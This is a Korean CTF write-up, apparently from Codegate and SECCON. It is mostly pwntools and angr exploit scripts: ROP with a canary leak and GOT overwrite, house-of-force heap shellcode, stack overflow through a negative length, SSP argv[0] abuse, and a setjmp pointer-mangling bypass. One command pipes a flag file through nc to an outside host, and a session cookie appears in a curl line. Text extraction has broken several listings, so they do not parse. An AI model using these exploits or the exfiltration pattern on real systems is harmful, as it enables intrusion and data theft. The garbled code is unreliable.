codegate writeup.pdf


import angr
import claripy
 
# Address at which symbolic execution starts; it is passed as `addr` to
# blank_state() further down.
# NOTE(review): presumably an instruction near the program's fgets() call,
# judging by the name only - confirm in a disassembler.
fgets           = 0x00000000004007D5
# Addresses handed to explore(find=...). 0x404fda is listed twice (once in
# upper case); the duplicate has no effect.
find           = (0x404fda,0x0404FAB,0x404FBC,0x404FDA,)
avoid          = tuple([0x4000060,0x4007ef,0x400818,0x400838,0x400861,0x400890,0x4008b9,0x4008e2,0x40090b,0x400934,0x400977,0x4009a0,0x4009c9,0x4009f2,0x400a1b,0x400a47,0x400a6c,0x400a95,0x400abb,0x400ae0,0x400b09,0x400b3f,0x400b68,0x400ba4,0x400bd6,0x400bff,0x400c31,0x400c5d,0x400c82,0x400cab,0x400cd0,0x400cf5,0x400d1b,0x400d40,0x400d69,0x400d92,0x400db2,0x400dd7,0x400e00,0x400e26,0x400e52,0x400e7b,0x400eb8,0x400edd,0x400f06,0x400f2f,0x400f58,0x400f78,0x400fa1,0x400fd0,0x400ff5,0x40101b,0x40104b,0x401070,0x401099,0x4010c2,0x4010e2,0x40110b,0x401134,0x40115d,0x401186,0x4011c2,0x4011eb,0x40121b,0x401244,0x40126d,0x401296,0x4012bf,0x4012e8,0x40131e,0x401347,0x401373,0x40139c,0x4013c5,0x4013e5,0x40140e,0x401437,0x401460,0x401489,0x4014b2,0x4014db,0x401504,0x40152d,0x401556,0x40157f,0x4015a8,0x4015d1,0x401600,0x401629,0x401652,0x40167b,0x4016a4,0x4016d3,0x4016fc,0x401725,0x40177b,0x4017a4,0x4017cc,0x4017f5,0x40181e,0x401854,0x40187d,0x4018b3,0x4018dc,0x401905,0x40192e,0x401957,0x401980,0x4019a9,0x4019d2,0x4019fb,0x401a24,0x401a53,0x401a7c,0x401aac,0x401ad5,0x401afe,0x401b2d,0x401b56,0x401b7f,0x401ba4,0x401bcd,0x401bf5,0x401c2b,0x401c5a,0x401c83,0x401cac,0x401cd5,0x401cfe,0x401d23,0x401d49,0x401d6e,0x401d97,0x401dd3,0x401dfc,0x401e25,0x401e4a,0x401e70,0x401e95,0x401eba,0x401ee3,0x401f12,0x401f3b,0x401f64,0x401f8d,0x401fb6,0x401fdf,0x402008,0x402031,0x40205a,0x402083,0x4020a8,0x4020cd,0x4020f3,0x402118,0x402141,0x40216a,0x4021a0,0x4021c9,0x4021ff,0x402224,0x40225d,0x402283,0x4022a8,0x4022d1,0x4022fa,0x402323,0x40234c,0x402375,0x40239e,0x4023c3,0x4023e8,0x40240d,0x402433,0x402458,0x40248e,0x4024c0,0x4024fc,0x402525,0x40254a,0x40256f,0x402595,0x4025ba,0x4025e3,0x402640,0x402672,0x402697,0x4026c6,0x4026ef,0x40271f,0x402748,0x40277e,0x4027a7,0x4027cd,0x4027f2,0x40281b,0x402844,0x40286d,0x402896,0x4028bf,0x4028f1,0x40291a,0x402943,0x402968,0x40298d,0x4029b6,0x4029db,0x402a15,0x402a3a,0x402a69,0x402a92,0x402abb,0x402af1,0x402b1a,0x402b43,0x402b79,0x402b9e,0x402bc7,0x402bf0,0x40
2c15,0x402c3a,0x402c69,0x402c92,0x402cb7,0x402cdd,0x402d02,0x402d2b,0x402d61,0x402d8a,0x402db3,0x402dd8,0x402e01,0x402e2f,0x402e58,0x402e8a,0x402eaf,0x402ede,0x402f03,0x402f2c,0x402f55,0x402f90,0x402fb6,0x402fe8,0x403011,0x40303a,0x40305a,0x403083,0x4030ac,0x4030d5,0x4030fe,0x40311e,0x403154,0x40317d,0x40319d,0x4031c6,0x4031ef,0x403218,0x403241,0x40326a,0x403293,0x4032da,0x403307,0x403330,0x403359,0x403395,0x4033cb,0x4033eb,0x403414,0x40343d,0x403466,0x40348f,0x4034b8,0x4034e1,0x403501,0x40352a,0x403559,0x403582,0x4035ab,0x4035d4,0x40360a,0x40362a,0x403660,0x403689,0x4036b2,0x403702,0x40372b,0x403754,0x40378a,0x4037c0,0x4037e9,0x403812,0x40383b,0x403864,0x40388d,0x4038c3,0x4038f9,0x40392f,0x403958,0x40397d,0x4039a3,0x4039c8,0x4039f1,0x403a1a,0x403a43,0x403a6c,0x403a91,0x403ac0,0x403ae5,0x403b14,0x403b3d,0x403b66,0x403b8f,0x403bb8,0x403be1,0x403c06,0x403c2b,0x403c5a,0x403c83,0x403cac,0x403ce2,0x403d0b,0x403d34,0x403d5d,0x403d82,0x403da7,0x403dd6,0x403dff,0x403e28,0x403e51,0x403e90,0x403ed1,0x403f07,0x403f30,0x403f66,0x403f8b,0x403fb0,0x403fd6,0x403ffb,0x404024,0x40405a,0x404083,0x4040ac,0x4040d1,0x4040f6,0x40411c,0x404141,0x40416a,0x404193,0x4041c9,0x4041f2,0x404218,0x40423d,0x404266,0x40428f,0x4042b8,0x4042e1,0x40430a,0x40432f,0x404358,0x40437d,0x4043a2,0x4043d4,0x4043fa,0x40441f,0x404448,0x404471,0x40449a,0x4044c3,0x4044ec,0x404511,0x40453a,0x40455f,0x404584,0x4045ad,0x4045d2,0x4045f8,0x40461d,0x404646,0x40466f,0x404698,0x4046c1,0x4046ea,0x40470f,0x404738,0x40475d,0x404782,0x4047ab,0x4047d0,0x4047f5,0x40481a,0x404840,0x404865,0x40488e,0x4048b7,0x4048dc,0x404901,0x404930,0x404959,0x404982,0x4049ab,0x4049d4,0x4049fd,0x404a1d,0x404a46,0x404a6f,0x404a98,0x404ac1,0x404aea,0x404b0a,0x404b33,0x404b5c,0x404b85,0x404bae,0x404bd7,0x404c00,0x404c29,0x404c6c,0x404c95,0x404cbe,0x404ce7,0x404d10,0x404d39,0x404d6f,0x404d98,0x404dc1,0x404dea,0x404e13,0x404e3c,0x404e61,0x404e90,0x404eb9,0x404ee2,0x404f0b,0x404f30,0x404f68,0x404f9])
 
# Symbolic-execution solver for the `angrybird` binary, kept as published.
# NOTE(review): text extraction dropped tokens in this listing - the targets
# of the two bare `= ...` assignments (later lines use `p` for the project and
# `s` for the state) and the comma in BVS("flag"24*8) - so it does not parse
# as-is. It also uses the Python 2 print statement and the old angr
# path_group / state.se API.
= angr.Project('/tmp/angrybird')
 
# Start from a blank state at `fgets` instead of the program entry point.
= p.factory.blank_state(addr = fgets )
# 24 symbolic bytes standing in for the input being solved for.
serial = s.se.BVS("flag"24*8)
ebp = 0x606f00
# Four 64-bit values are written into the frame slots below rbp.
# NOTE(review): claripy.BVS(name, size) creates a *symbolic* variable and
# expects a string name; a concrete pointer value would be
# claripy.BVV(value, 64). Confirm which one was intended here.
s.memory.store(ebp-0x70, claripy.BVS(0x606018,64))
s.memory.store(ebp-0x68, claripy.BVS(0x606020,64))
s.memory.store(ebp-0x60, claripy.BVS(0x606028,64))
s.memory.store(ebp-0x58, claripy.BVS(0x606038,64))
# The symbolic input buffer lives at rbp-0x50.
s.memory.store(ebp-0x50, serial)
s.regs.rbp = ebp
 
# Explore until one of the `find` addresses is reached, pruning every path
# that touches an address in `avoid`.
pg = p.factory.path_group(s)
pg.explore(find = find, avoid=avoid)
 
 
# Bare expression left over from an interactive session; it has no effect in
# a script.
pg
# Concretise the input for the first path that reached a target and strip
# NUL bytes from both ends. Raises IndexError if no path was found.
print pg.found[0].state.se.any_str(serial).strip("\x00")
from pwn import *
 
# Exploit script for the `babypwn` challenge service, kept as published.
# NOTE(review): text extraction dropped several tokens in this listing
# (assignment targets, commas, closing brackets and parentheses), so it does
# not parse as-is. Later lines use `e` (challenge ELF), `l` (libc ELF) and `s`
# (remote connection); those are presumably the names lost from the bare
# `= ...` lines below.
= ELF('/root/codegate/babypwn')
#l = ELF('/lib/i386-linux-gnu/libc-2.23.so')
= ELF('/root/codegate/92'# libcdb.com
= remote('110.10.212.130'8889)
#s = remote('0',8181)
 
# Stage 1: read the stack canary back from the service.
# 41 filler bytes are sent, their echo is consumed, and the bytes that follow
# are combined with a leading NUL to form the canary value.
# NOTE(review): '\x00' plus 4 received bytes is 5 bytes, while u32 unpacks
# exactly 4 - recv(3) was presumably intended.
print s.recvuntil(' >')
s.sendline('1')
print s.recvuntil(':')
s.send('a'*41)
print s.recvuntil('a'*41)
canary = u32('\x00'+s.recv(4))
print hex(canary)
 
 
s.sendline('1')
print s.recvuntil(':')
# Hard-coded code addresses in the challenge binary.
# NOTE(review): roles are inferred from the names only (a pop/pop/pop/ret
# gadget and the binary's send/recv helpers) - confirm in a disassembler.
pppr = 0x8048B83
 
c_send = 0x080488B1
c_recv = 0x08048907
send = 0x08048700
# Return-oriented chain placed after the canary:
#   1. c_send(got['send'])     - discloses the resolved libc address of send
#   2. c_recv(got['send'], 40) - lets the client rewrite that GOT slot
#   3. send(got['send'] + 4)   - calls through the rewritten slot, with the
#                                bytes stored right after it as the argument
# As written this depends on three things a hardened build would remove: a
# canary that can be read back, fixed code addresses (no PIE) and a writable
# GOT entry (no full RELRO).
rop = '1'*0xc
#rop += e.symbols['mend'] + p32(pppr) + p32(
rop += p32( c_send ) + p32( pppr+2 ) + p32( e.got['send'] )
rop += p32( c_recv ) + p32( pppr+1 ) + p32( e.got['send'] ) + p32(40)
rop += p32( send ) + 'AAAA' + p32( e.got['send'+ 4 )
 
# 40 filler bytes, the leaked canary so the stack check passes, then the chain.
s.send('a'*40+p32(canary)+rop)
s.sendline('3')
print s.recvuntil('Select menu > ')
# First 4 bytes returned are the libc address of send; system is located via
# the distance between the two symbols in the matching libc build.
leak_libc = u32(s.recv(4))
system = leak_libc + (l.symbols['system'- l.symbols['send'])
print 'LIBC : %x' % leak_libc
 
# Shell command that pipes the flag file to a listener run by the author.
cmd = 'cat flag|nc cutejinu.xyz 4999;'
# Payload for step 2 of the chain: the new GOT value followed by the command.
s.send( p32(system) + cmd )#'ls|nc cutejinu.xyz 4999;' )
 
s.interactive()
from pwn import *
 
# Client script for a Base64-input challenge service, kept as published.
# NOTE(review): extraction dropped the assignment target and the comma of the
# first line; the following lines use `s` for this connection.
= remote('110.10.212.138'19091)
s.recvuntil('Input >')
# Base64 text: 40 characters decoding to a 30-byte string whose last byte is
# NUL.
sc = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA"
s.sendline(sc)
s.recvuntil('[*] USER : ')
print s.recvuntil('Input')
# The same value is sent a second time unchanged ...
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA')
print s.recvuntil('Input')
# ... and a third time with '==' appended.
# NOTE(review): the page does not explain the surplus padding; presumably the
# service compares the encoded text and the decoded value separately.
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA==')
# Quoted Base64 for the command `cat flag`.
s.sendline('"Y2F0IGZsYWc="')
# NOTE(review): the trailing '%' looks like a terminal artifact copied along
# with the listing; it is not valid here.
s.interactive()%
from pwn import *
import angr
import os
import urllib2
 
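def a(c):
    """Recover the argv[1] value that challenge binary number *c* accepts.

    The binary is read from /tmp/n/prob<c>. objdump output is used to find
    the first disassembly line that mentions the address of the "Good"
    string (the `find` target) and every call to exit@plt (the `avoid`
    targets). angr then searches for a 100-byte symbolic argv[1] that
    reaches `find`.

    Returns the concrete solution up to, but not including, its first NUL
    byte. Raises IndexError when no path reaches the target.
    """
    path = '/tmp/n/prob%d'%c
    # The shell commands below are built by string formatting. `path` only
    # ever contains the number `c` (the %d conversion rejects non-numeric
    # values), so nothing untrusted reaches the shell here.
    s = process('/bin/sh')
    try:
        e = ELF(path)
        st = '0x%x' % list(e.search('Good'))[0]
        s.sendline( "objdump --disassemble %s|grep %s|awk '{print $1}'" % (path, st) )
        res = s.recvline().strip()
        find = int( res.replace(':','') , 16 )

        s.sendline("objdump --disassemble %s|grep \"exit@plt>\"|grep call|awk '{print $1}';echo END" % path)
        tmp = s.recvuntil('END').replace(':','').strip().replace('\nEND','').split('\n')
    finally:
        # One helper shell is spawned per call; close it so a run over all
        # binaries does not accumulate child processes.
        s.close()

    # find+12 is avoided as well.
    # NOTE(review): the page does not say what lives at find+12 - presumably
    # the instruction on the failure side of the final check; confirm.
    avoid = [find+12,]
    # Skip empty lines so a binary without exit@plt calls does not fail on
    # int('', 16).
    avoid.extend(int(t,16) for t in tmp if t)
    avoid = tuple(avoid)

    project = angr.Project(path, load_options={'auto_load_libs':False})
    argv1 = angr.claripy.BVS("argv1",100*8)
    initial_state = project.factory.path(args=[path,argv1])
    pg = project.factory.path_group(initial_state)
    pg.explore(avoid=avoid,find=find)
    found = pg.found[0]
    solution = found.state.se.any_str(argv1)
    # Cut at the first NUL. The previous slice used find("\x00"), which
    # returns -1 when there is no NUL and silently dropped the last byte.
    return solution.split("\x00", 1)[0]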
 
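# Solve binaries 1..101 in turn and submit each answer to the scoring page.
# NOTE(review): the curl command embeds a PHPSESSID session cookie. A script
# that is going to be published should read such a value from the
# environment, and a cookie that has appeared in public should be treated as
# exposed and invalidated.
for i in range(1,102):
# for i in [6,23,31,41,54,72,76,85,86,99,100]:
    try:
        print i
        # Percent-encode the answer before it is interpolated into the
        # single-quoted shell argument, so quotes or shell metacharacters in
        # the solver output cannot break out of the curl command line.
        t = urllib2.quote(a(i))
        print t
        os.system("""curl 'http://110.10.212.131:8777/auth.php' -H 'Cookie: PHPSESSID=ufccld9ve2su5t7pksvdud4215' -H 'Origin: http://110.10.212.131:8777' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://110.10.212.131:8777/' -H 'Connection: keep-alive' --data 'prob=%d&key=%s' --compressed"""%(i,t))
    # Catch ordinary failures only: a bare `except:` also swallowed Ctrl-C
    # and SystemExit, which made the 101-binary run impossible to interrupt.
    except Exception as err:
        print "ERROR", err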


codegate writeup.pdf



top chunk를 ffffffffffffffff로 덮고 다음 malloc할때 got부분을 할당받으면 된다

0x00400000         0x00402000         r-xp    /root/logger
0x00601000         0x00602000         r-xp    /root/logger
0x00602000         0x00603000         rwxp    /root/logger
0x00603000         0x00624000         rwxp    [heap]

heap의 권한이 rwxp이기때문에 힙에다 쉘코드를 넣으면 된다


from pwn import *
 
# Set-up for the SECCON `logger` script, kept as published.
# NOTE(review): extraction dropped the targets of the two bare `= ...`
# assignments; later lines use `s` for the first connection, and `e` is
# presumably the name lost from `= ELF(elf)`.
elf = "/root/pwn/seccon/logger"
#lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
# s = process(elf)
# s1 = process(elf)
# Two separate connections to the same service are opened.
= remote('logger.pwn.seccon.jp',6565)
s1 = remote('logger.pwn.seccon.jp',6565)
= ELF(elf)
#l = ELF(lib32)
 
# DEBUG > 0 prints the local process id; DEBUG == 2 also enables pwntools
# debug logging.
DEBUG = 0
if DEBUG > 0:
    print "PID : %d" % util.proc.pidof(s)[0]
    if DEBUG == 2:
        context.log_level = 'debug'
 
# A timestamp is used as a fresh identifier for this run.
uid = str(time.time())
#uid = "debug"
 
# Menu option 1 followed by the identifier sent twice, on the first
# connection ...
# NOTE(review): presumably user name and password of a new account - the
# prompts are not shown on the page.
s.recvuntil("exit")
s.sendline("1")
s.sendline(uid)
s.sendline(uid)
s.recvuntil("exit")
print "[*] id : %s" % uid
 
# ... and the same three lines on the second connection, so both sessions
# use the same identifier.
s1.sendline("1")
s1.sendline(uid)
s1.sendline(uid)
 
def read(ss):
    """Select menu entry 1 on *ss* and return the text printed before the menu.

    Everything received up to "exit" is read; the part preceding the first
    "1. Read log" is returned (the whole reply if that marker is absent).
    """
    ss.sendline("1")
    reply = ss.recvuntil("exit")
    before_menu = reply.partition("1. Read log")[0]
    return before_menu
def append(ss,size,data):
    """Select menu entry 2 on *ss*, then send *size* and *data* as two lines.

    Waits for the "128byte" prompt before sending and for the next menu
    ("exit") afterwards. *size* is converted with str(), so an int or an
    already formatted string both work.
    """
    ss.sendline("2")
    ss.recvuntil("128byte")
    for field in (str(size), data):
        ss.sendline(field)
    ss.recvuntil("exit")
def leak(ss):
    """Select menu entry 3 on *ss* and return the bytes printed after the file name.

    After the "filename: " prompt, 32 bytes are discarded; whatever follows
    up to (not including) the next "=" is returned, right-padded with NUL
    bytes to 8 bytes so the caller can unpack it as a 64-bit value. Values
    longer than 8 bytes are returned unpadded.
    """
    ss.sendline("3")
    ss.recvuntil("filename: ")
    ss.recv(32)
    raw = ss.recvuntil("=")[:-1]
    padding = "\x00" * (8 - len(raw))
    ss.recvuntil("exit")
    return raw + padding
 
# Main flow of the `logger` script, kept as published.
# It depends on two properties visible in the memory map quoted on this page:
# the heap and the 0x602000-0x603000 segment are mapped rwx, so data written
# there is executable. It also depends on the allocator accepting an
# overwritten top-chunk size; glibc 2.29 and later abort on an implausible
# top size.
#buf = malloc(file_size) leak
heap_addr = u64( leak(s) )
print "[*] LEAK_HEAP : %x" % heap_addr
 
#house of force
#topchunk = ffffffffffffffff
# 32 bytes of 0xff are appended through the second session, then the log is
# read on the first one.
# NOTE(review): presumably the read copies the now longer log into a buffer
# sized before the append, so the 0xff bytes land on the top-chunk size
# field - confirm against the binary.
append(s1,32,"\xff"*32)
read(s)
 
# Allocation size chosen so that the following allocation is served from the
# area just below 0x602050.
offset = 0x602050 - 0x28 - heap_addr# - (32+16)
print "[*] offset : %d" % offset
#append(s,"%d"%offset,"A")
append(s,"%d"%offset,"")
 
#got Overwrite
s.sendline("2")
s.sendline("128")
#http://shell-storm.org/shellcode/files/shellcode-806.php
# 27-byte shellcode from the reference above, left-padded with 0x90 (NOP)
# bytes to 0x40 bytes and followed by the 64-bit value 0x602080.
# NOTE(review): 0x602080 presumably points into the padded buffer itself and
# overwrites a function pointer slot - the page only says "got Overwrite".
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
sc = "\x90"*(0x40-len(sc)) + sc
sc += p64(0x602080)
s.sendline(sc)
s.interactive()
from pwn import *
 
# Script for the SECCON `cheer_msg` service, kept as published.
# NOTE(review): extraction dropped tokens in this listing - the targets of
# the three bare `= ...` assignments (later lines use `s` for the connection,
# `e` for the challenge ELF and `l` for libc) and the closing `]` in two
# l.symbols['printf' ... expressions - so it does not parse as-is.
elf = "/root/pwn/seccon/cheer_msg"
lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
#s = process(elf)
= remote('cheermsg.pwn.seccon.jp',30527)
= ELF(elf)
= ELF(lib32)
 
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'
 
print s.recv()
# A negative message length is sent.
# NOTE(review): the page does not explain the value -142; presumably the
# service uses the length unchecked when sizing a stack buffer, so the name
# read afterwards overlaps the saved return address. Confirm in the binary.
# Rejecting negative and oversized lengths server-side removes the issue.
s.sendline("-142")
print s.recv()
# Hard-coded code addresses in the challenge binary (fixed because the
# script assumes the binary is not relocated). `ppppr` is only referenced by
# the commented-out lines below.
ppppr = 0x80487AC
main = 0x080484B0
# Distance between printf and system in the libc build named above.
offset = l.symbols['printf'- l.symbols['system']
#sh = p32(0x08048627) + p32(0x804a090) + p32(0x804a090-1) + p32(100)
#sh += p32(0x080485CA) + p32(ppppr + 1) + p32(0x804A020) + p32(20)
#sh = p32(0x0804863C) + p32(0x0804A065)
#sh = "A"*80+"PPPR12345678asdfzxcv" + "\n"
# Round 1: call printf on its own GOT entry to disclose the libc address of
# printf, then return into main so the program can be driven a second time.
sh = p32(e.symbols['printf']) + p32(main) + p32(e.got['printf'])
# Pause until Enter is pressed (e.g. to attach a debugger).
raw_input()
 
#s.send("A"*0x30+shellcode)
s.sendline    ( "A"*0x10 + 
            sh)
print s.recvuntil("Message : ")
print s.recvuntil("\n")
# The next 4 bytes received are taken as the disclosed printf address.
leak = u32(s.recv(4))
 
print "[*] LEAK : %x" % leak
 
print s.recvuntil("Message Length >>")
s.sendline("-142")
 
# Round 2: system (leak - offset) with the address of an "sh\0" string found
# in the same libc build as its argument; "AAAA" fills the return-address
# slot.
sh = p32(leak - offset) + "AAAA" + p32(leak - (l.symbols['printf'- list(l.search("sh\x00"))[0]))
 
s.sendline( "A"*0x10 + sh)
s.interactive()

SSP에서 stack smashing detected 뒤에 나오는 argv[0]포인터를 FLAG 버퍼로 변조하면 된다

# Build the input for the SECCON `checker` service and print it.
# Layout: one "kk" line, eight filler lines of 384 down to 377 'A' characters,
# one line of 376 'A' characters followed by the little-endian bytes
# c0 10 60 00, then the answers "yes" and "a".
# NOTE(review): according to the write-up the 4 bytes replace the argv[0]
# pointer that the "stack smashing detected" message prints, so that it
# refers to the flag buffer. The shrinking filler lines presumably clear the
# bytes in between one NUL terminator at a time - confirm against the binary.
# Newer glibc releases no longer print argv[0] in that message.
lines = ["kk"]
lines.extend("A" * count for count in range(384, 376, -1))
lines.append("A" * 376 + "\xc0\x10\x60\x00")
lines.extend(["yes", "a"])
sc = "\n".join(lines) + "\n"
print sc

[*] '/root/pwn/seccon/jmper'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE


[_]FULL RELRO가 걸려있어서 got를 덮다 프로그램이 죽는바람에 놀랐다


00 : BUF

08 : NUM
10 : NAME
18
20
28 : *MEMO

 i = 0; i <= 32; ++i
1byte overflow가 나고, NAME에서 MEMO의 1byte를 조작한 후 MEMO 포인터를 가리키게 한 뒤 그 포인터를 수정하면 원하는 곳에 있는 데이터를 수정할 수 있다

MEMO 포인터를 변조해 LIBC 주소와 _setjmp할 때 쓰인 XOR 키값을 빼오고, _setjmp(jmpbuf)할 때 저장된 rsp, rip를 변조해서 원샷 가젯으로 가게 하면 된다
rsp + 0x30 ???인가가 원샷 가젯의 두 번째 인자로 들어가서, 그 부분이 0을 가리키게 rsp를 조작해야 된다

from pwn import *
 
# Set-up for the SECCON `jmper` script, kept as published.
# NOTE(review): extraction dropped the targets of the three bare `= ...`
# assignments; later lines use `s` for the connection, `e` for the challenge
# ELF and `l` for the libc ELF.
elf = "/root/pwn/seccon/jmper"
lib64 = "/root/pwn/seccon/libc-2.19.so-8674307c6c294e2f710def8c57925a50e60ee69e"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
#s = process(elf)
= remote('jmper.pwn.seccon.jp',5656)
= ELF(elf)
= ELF(lib64)
# Consume the initial menu, which ends with "Bye :)".
print s.recvuntil("Bye :)")
 
# DEBUG == 2 enables pwntools debug logging; any other value does nothing.
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'
 
def ROR(data, shift, size=64):
    """Rotate *data* right by *shift* bits within a *size*-bit word.

    *shift* is reduced modulo *size*. *data* is assumed to satisfy
    0 <= data < 2**size; wider values are not masked.
    """
    shift %= size
    low_mask = (1 << shift) - 1
    # The low `shift` bits wrap around to the top of the word.
    wrapped = (data & low_mask) << (size - shift)
    return (data >> shift) + wrapped
def ROL(data, shift, size=64):
    """Rotate *data* left by *shift* bits within a *size*-bit word.

    *shift* is reduced modulo *size*. *data* is assumed to satisfy
    0 <= data < 2**size; wider values are not masked.
    """
    shift %= size
    split = size - shift
    # Bits above the split point wrap around to the bottom of the word.
    carried = data >> split
    kept = data & ((1 << split) - 1)
    return (kept << shift) + carried
 
def add():
    # Select menu entry 1 on the global connection `s` and echo the reply up
    # to the end of the next menu ("Bye :)").
    s.sendline("1")
    print s.recvuntil("Bye :)")
 
def name(id,t):
    # Select menu entry 2, send record number `id`, then send `t` verbatim
    # (send, not sendline, so the caller controls the terminating newline).
    # Each reply is printed. `id` shadows the builtin of the same name.
    s.sendline("2")
    print s.recv()
    s.sendline(str(id))
    print s.recv()
    s.send(t)
    print s.recvuntil("Bye :)")
 
def memo(id,t):
    # Select menu entry 3, send record number `id`, then send `t` verbatim
    # (send, not sendline, so the caller controls the terminating newline).
    # Each reply is printed. `id` shadows the builtin of the same name.
    s.sendline("3")
    print s.recv()
    s.sendline(str(id))
    print s.recv()
    s.send(t)
    print s.recvuntil("Bye :)")
 
def v_name(id):
    # Select menu entry 4 for record number `id`, skip the output up to
    # "ID:", and return whatever arrives next without further parsing.
    # NOTE(review): recv() returns only what is currently buffered, so the
    # length of the result depends on timing.
    s.sendline("4")
    print s.recv()
    s.sendline(str(id))
    print s.recvuntil("ID:")
    return s.recv()
 
def v_memo(id):
    # Select menu entry 5 for record number `id` and return the reply up to
    # the start of the next menu: everything before "1.", with those two
    # characters removed.
    s.sendline("5")
    print s.recv()
    s.sendline(str(id))
    return s.recvuntil("1.")[:-2]
# Main flow of the `jmper` script, kept as published.
# NOTE(review): extraction dropped tokens in three lines below - the comma
# and a closing parenthesis in the two `memo( N"A"*0x20 + chr( ... )` calls
# and the closing `]` in l.symbols['printf' - so it does not parse as-is.
add()
 
# The memo is filled with 0x1f 'A' characters and a 'B' marker; the bytes the
# service prints after the marker are read as a heap address.
memo(0,"A"*0x1f+"B\n")
leak_heap = v_memo(0).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
 
print "[*] LEAK HEAP : %x" % leak_heap
# Give up when the low byte of the leaked address is below 0x20; the byte
# written next is derived from it by subtracting 0x18.
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
# 0x20 filler bytes plus one extra byte: the one-byte overflow described in
# the write-up, used to redirect the adjacent pointer.
memo( 0"A"*0x20 + chr( (leak_heap&0xff- 0x18 ) )
# With the pointer redirected, writing the name stores the address of the
# printf GOT entry, and viewing the name then prints the libc address held
# there (6 bytes, zero-extended to 8).
name( 0,p64(e.got['printf'])+"\n")
leak_libc = u64(v_name(0)[:6]+"\x00\x00")
print "[*] LIBC LEAK : %x" % leak_libc
 
add()
 
# Same two steps for a second record.
memo(1,"A"*0x1f+"B\n")
leak_heap = v_memo(1).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
 
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
memo( 1"A"*0x20 + chr( (leak_heap&0xff- 0x18 ) )
 
# Location of the saved setjmp buffer relative to the leaked heap address, and
# of the two slots read and rewritten below (0x30 into the buffer).
# `ori_ret` is the known, unmangled return address stored by setjmp.
jmper = leak_heap-0x180
ret = jmper+0x30
ori_ret = 0x00400C31
add()
# print "PID : %d" % util.proc.pidof(s)[0]
# raw_input()
name( 1, p64(ret)+"\n" )
# Bytes 8..16 of the view are the stored (mangled) return address.
leak_ret = u64(v_name(1)[8:16])
# The stored value is ROL(address ^ key, 0x11), so a known address reveals
# the key: key = ROR(stored, 0x11) ^ address. The protection only holds
# while neither the key nor a mangled copy of a known pointer can be read.
xorkey = ROR(leak_ret,0x11) ^ ori_ret
# Target address inside libc, computed from the printf leak and a fixed
# offset for the libc build named at the top of the script.
oneshot = leak_libc - l.symbols['printf'+ 0x04647C
# Mangle the replacement return address and stack pointer with the same key.
rreett = ROL(oneshot^xorkey,0x11)
rsp = ROL((leak_heap+0x400)^xorkey,0x11)
print "[*] LEAK JMPER_ADDR : %x" % jmper
print "[*] LEAK RET : %x" % leak_ret
print "[*] XOR KEY : %x" % xorkey
print "[*] change,xor : %x,%x" % (oneshot,rreett)
print (p64(rsp)+p64(rreett)).encode('hex')
add()
# Overwrite the two stored slots with the re-mangled values.
name (1,p64(rsp)+p64(rreett)+"\n")
# 27 further "add" requests.
# NOTE(review): presumably this exhausts the record limit so that the
# program takes its longjmp path - the page does not say.
s.send("1\n"*27)
s.interactive()